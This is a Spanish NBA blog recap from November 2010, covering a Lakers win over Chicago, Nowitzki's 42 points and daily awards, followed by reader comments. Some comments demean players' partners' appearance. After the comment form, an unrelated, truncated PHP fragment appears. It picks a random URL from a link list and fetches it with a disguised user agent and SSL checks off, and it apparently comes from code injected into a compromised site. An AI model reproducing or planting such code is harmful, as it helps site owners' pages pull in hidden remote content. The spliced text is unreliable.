La Crónica (23/11/2010)

24 de November de 2010 por telekoman

Está resultando de lo más interesante la lucha por la primera plaza del Oeste y eso que llevamos tan sólo un sexto de la liga regular. Spurs, Hornets y Lakers siguen empeñados en una carrera desenfrenada por conseguir los mejores números. Hoy le tocaba el turno al equipo angelino y cumplió ante un rival de cierta entidad como Chicago. No fue un gran partido de los interiores de los Lakers, que se dejaron comer la tostada en el rebote por Noah y Taj Gibson, y además Derrick Rose se puso las botas ante Fisher y Blake pero aun así los Bulls perdieron. 62 puntos repartidos entre Kobe, Odom y Shannon Brown más 11 rebotes y algún punto de Pau valieron para conseguir la victoria número 13 por 91-98.

Y ese ha sido el único partido con algo de enjundia. El resto está plagado de equipos del Este que luchaban entre sí por salir de la mediocridad. Indiana confirmó por un lado que tiene opciones de meterse en Playoffs a poco que luche mínimamente y por otro que Cleveland es una banda de cuidado (y ojo que van octavos). 24 puntos de Granger y 18 de Collison y apañado. 89-100 y por que el equipo descansó en el último cuarto.

En el Hawks-Nets se confirmó la caída en picado de los Atlanta. Tercera derrota consecutiva y esta vez ante un rival claramente inferior. De nada sirvieron los 21 puntos de Jamal Crawford ni los 20 de Josh Smith. Entre Brook López y Devin Harris se bastaron para llevarse la victoria por 101-107. Los otros dos partidos entre equipos de la zona baja del Este se saldaron con apretadas victorias de Washington en casa sobre el colista Philadelphia (114-116) con Wall de protagonista absoluto y de New York sobre Charlotte (107-111) con un partido bastante apañado de todos los titulares y de Toney Douglas, que está haciendo un segundo año más que meritorio.

Y por último Dallas ganó en casa a Detroit con muchos más problemas de los esperados (84-88) gracias a una mostruosa actuación de Nowitzki que se fue a 42 puntos y 12 rebotes. Sólo Terry con 16 y Butler con 11 puntos acompañaron mínimamente al alemán. No debe de estar muy contento Cuban pese a la victoria.

PREMIOS

MVP: Seguro que a Dirk Nowitzki no le hacen gracia todas esas opiniones que sitúan a Pau Gasol por encima suyo y, como ya hemos comentado en la crónica, anoche se cascó un gran partido de 42 puntos y 12 rebotes.

Rookie: Volvió John Wall y lo hizo a buen ritmo: 25 puntos, 3 rebotes y 6 asistencias. Y victoria de los Wizards, por cierto.

Sorpresa: Vaya 2 partiditos consecutivos que lleva Javale McGee. El de hoy, de 24 puntos y 18 rebotes, casi le podría haber otorgado el MVP del día.

Decepción: No hemos encontrado nada que nos haya decepcionado especialmente. Podríamos nombrar el pobre rendimiento del quinteto de titular de Cleveland o el 0 de 6 de Dereck Fisher, pero todos sabemos que falta mucho para que llegue el momento del veterano base.

Esfuerzo en vano: Los Lakers son mucho Lakers y si no que se lo pregunten a Derrick Rose. Sus 30 puntos, 5 rebotes y 8 asistencias se quedaron en nada ante el empuje de Shannon Brown y Steve Blake en el último cuarto.

Comenta

18 comentarios a esta entrada

  1. TheDeerHunter dice:
    #1

    El partido Sixers@Wizards lo tiraron los Sixers a la basura. Primero Brand se autoexpulsó dándole un guarrazo sin venir a cuento a McGee. Luego Turner falló dos tiros libres con tres arriba en los últimos segundos y después cometieron una falta absurda de tres tiros sobre Wall, lo que les costó la prórroga.
    Por último fue Young quien terminó masacrándoles…

      Citar

  2. scriers dice:
    #2

    Qué disparidad entre este y oeste, cómo se ha vuelto a disparar la diferencia, que parecía más contenida que otros años.
    En cualquier caso, sobre la jornada, parece mentira que los Sixers dejaran marchar ese partido. A mí McGee siempre me ha parecido que daba para más, quizá no tanto como en los últimos partidos, pero con esa envergadura, tampoco era un tío para 10 minutos y coger 2 rebotitos. Si los Wizards acertaran a combinar a Wall-Arenas en el campo con Young desde el banco tendría anotación asegurada todo el partido, el problema es que están muy verdes en defensa, y eso que son atléticos y jóvenes.
    En cuanto a lo demás, lo de Gasol es normal, después de un partido perfecto uno imperfecto, le pasó a Allen en la final, le pasa a todo el mundo que recibe mucho elogio. Una jornada sin sorpresas.

      Citar

  3. cocinitas dice:
    #3

    Si es cierto el nivel en el este a partir del 5 clasificado es lamentable. También es cierto que Gasol ayer estuvo bastante mal en el tiro, aún asi hizo unos numeros decentes. Me esta sorprendiendo en nivel de Brown esta temporada vaya porcentajes que lleva en tiros de 3, anoche el banquillo de Lakers aportó 39 puntos por solo 10 que aporto el de los Bulls. Alguien más piensa que estos bulls con Rose a este nivel y con la vuelta de Boozer pueden dar algún susto en playoffs a Orlando y Miami???
    Veo bien a Indiana este año con Collison, Granger y Hibert jugando así no deberian bajar de la 6 plaza del este.
    Partidazo de Dirk anoche la vida le dio a Dallas, este año no veo a los Mavericks pasando la primera ronda la verdad.

      Citar

  4. AndiD dice:
    #4

    Lo de Wall es impresionante, pero su elección del último tiro ayer deja bastante que desear. Con unos cuantos segundos por delante, se tira un melón desde 8’5 metros con un tío delante. Tuvo suerte que le pitaron falta y, eso sí, después metió los 3 tiros libres para ir a la prórroga (no como Turner unos segundos antes).
    De todas formas, la velocidad que tiene con el balón no la había visto nunca antes.

      Citar

  5. GreenPride dice:
    #5

    En el Lakers-Bulls decir que la noche de Gasol fue realmente horrible. Hasta ahora estaba jugando impresionante y para mí era el jugador de lo que llevamos de temporada NBA pero la verdad es que ayer le comieron entre Noah y Gibson en el rebote, en ataque estuvo fallón y en defensa tampoco pudo con Noah. Aparte de eso y del gran partido de Rose ni así los Bulls pudieron con los Lakers lo cual es una buena noticia para los de LA. La victoria se debió en gran medida a la gran aportación del banquillo de los Lakers, muy mejorado este año. Entre Blake, Barnes y sobre todo Brown que está que se sale despacharon el partido que entraba igualado en el último cuarto.
    Veremos si con Boozer los Bulls están en condiciones de luchar con Orlando y Miami, yo creo que aún les quedará un poco para ganarles pero que podrán competir en una serie de playoffs para acabar cayendo.

      Citar

  6. telekoman dice:
    #6

    Jajaja. Pues no sé por qué lo dices 🙂

      Citar

  7. Sempren dice:
    #7

    Bueno GreenPride, los Bulls tampoco tenían un equipazo hace dos años, y le plantaron cara a 7 partidos a los Celtics, como bien recordarás.
    Por ahora es pronto, tanto por ellos, como por los Heat, pero darán guerra, estoy seguro.

      Citar

  8. sergio dice:
    #8

    Sempren…. eso fue sin Garnett por una lado y Deng por otro. Que tampoco es ni era excusa. Desde luego los dos equipos han mejorado bastante. Aquellos Bulls creo que jugaron con solo 7 u 8 jugadores en la rotacion (no minutos de la basura). Tanto Rose como Noah han incrementado sus prestaciones y Thomas no es Boozer. Vale que no tienen a HInrich, Salmons o Gordon para tirar desde fuera… pero bien me valen Korver, Brewer o Gibson como especialistas en lo suyo.

    Yo soy de los que piensan que pueden dar un susto. Creo que el juego de los Magic no les beneficia en absoluto.. pero si no se cruzan antes con ellos creo que son equipo de Finales de Conferencia

      Citar

  9. MagicJohnson32 dice:
    #9

    Cómo está jugando el trío Blake-Brown-Barnes. Su +/- tiene que ser altísimo, y además están demostrando que pueden jugar los minutos decisivos. Lo de Shannon con los triples es una barbaridad, está en un 51% de acierto y promedia 12 puntos en 19 minutos, los tira con una confianza brutal. Claro, con esa elevación que se gasta el muchacho…

      Citar

  10. Tobal dice:
    #10

    En los partidos de ayer,destacar el partidazo de Nowitzki,que anotó casi la mitad de los puntos de Dallas,y la aportación del banquillo de los Lakers,con un sensacional Shannon Brown,que está haciendo un gran comienzo de campaña.

      Citar

  11. Denise dice:
    #11

    Una duda masculina: Soy el único al que no le gustan las “mujeres” de Parker? Longoria, Erin Barry, la ahora tal Sophia Egelar…., en fín, para personas “normales” no están mal, pero si yo fuera un millonario como Parker no estaría con estas tías ni harto de vino. Ya sé que es cuestión de gustos…..y yo discrepo con el de Parker.

    El nivel del este es tan pésimo que hasta los Pacers parecen que se van a clasificar para PO de calle.

    Dentro de unas horas, hay un interesantísimo Orlando-Miami, creo que si Orlando gana, Spoelstra va a la calle,; y si Miami gana, el figura de Van Gundy quedaría muy tocado

      Citar

  12. Denise dice:
    #12

    Esta es Longoria sin maquillaje

    http://2.bp.blogspot.com/_a7_nQRm492E/RxtOPPxoVgI/AAAAAAAAFAE/G7drTUnbYOs/s400/no-makeup-eva-longoria-400a050307.jpg

    nota: No sé si está permitido poner links, y menos de temas no baloncestísticos. Pido disculpas a los creadores del blog si no está permitido, y entenderé si me borran el mensaje.

      Citar

  13. TheDeerHunter dice:
    #13

    Va Denise… no me digas que no has toreado en peores plazas XD
    ¿Y qué te parece la Alexandra Paressant??
    En fin… que yo no tendría tantos reparos llegado el caso.

      Citar

  14. TheDeerHunter dice:
    #14

    eso sí, la foto es horrenda… pero fotos chungas tenemos todos.
    De todas formas sí te reconozco que ni la Longoria, ni la Barry ni la otra son algo sobrenatural.

      Citar

  15. Denise dice:
    #15

    Deer, me estoy refiriendo si yo fuera Parker o un millonario como él, para cualquier “matao” como nosotros están bien, pero, repito, si tuviera 30 kilos en el banco no estaría con ninguna de esas. La Alexandra esa de la que hablas….no está mal, pero las hay mejores (según el canón o prototipo de mujer que a mi me gusta).
    Por cierto, para fea, la novia de Dirk Nowitki, esa que robó en una tienda, si mal no recuerdo.

    No estaría mal un post con las mejores/peores novias de jugadores NBA. jejej

      Citar

  16. Toni dice:
    #16

    Apoyo la candidatura del post xddd.

    Quizá (no, seguro) el peor jugador de estos Lakers en el inicio de la temporada haya sido Ron Artest. Qué pensais, que se dejará llevar descaradamente tras haber conseguido su deseado anillo o que volverá en los momentos importantes? Yo, particularmente, lo tengo en un pedestal después del partidazo que se marcó en el séptimo de las finales.

    El otro día Denise creo que mencionó a Hibbert… Yo voy más allá, pienso que las remotas opciones de que los Pacers se cuelen en playoff (eso significaría que ha sido menos malo que otros) pasan porque éste mantenga el nivel que lleva mostrando, de hecho, pienso que es un muy buen center, es más, llevo 2 porras poniendolo como MIP jajaja.

      Citar

  17. TheDeerHunter dice:
    #17

    Denise… no creo que haya nadie aquí mejor preparado que tú para hacer ese post que propones…

    ánimo y al toro, nene

      Citar

  18. Txusma dice:
    #18

    Ya lo espero con ansias!

    😀

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>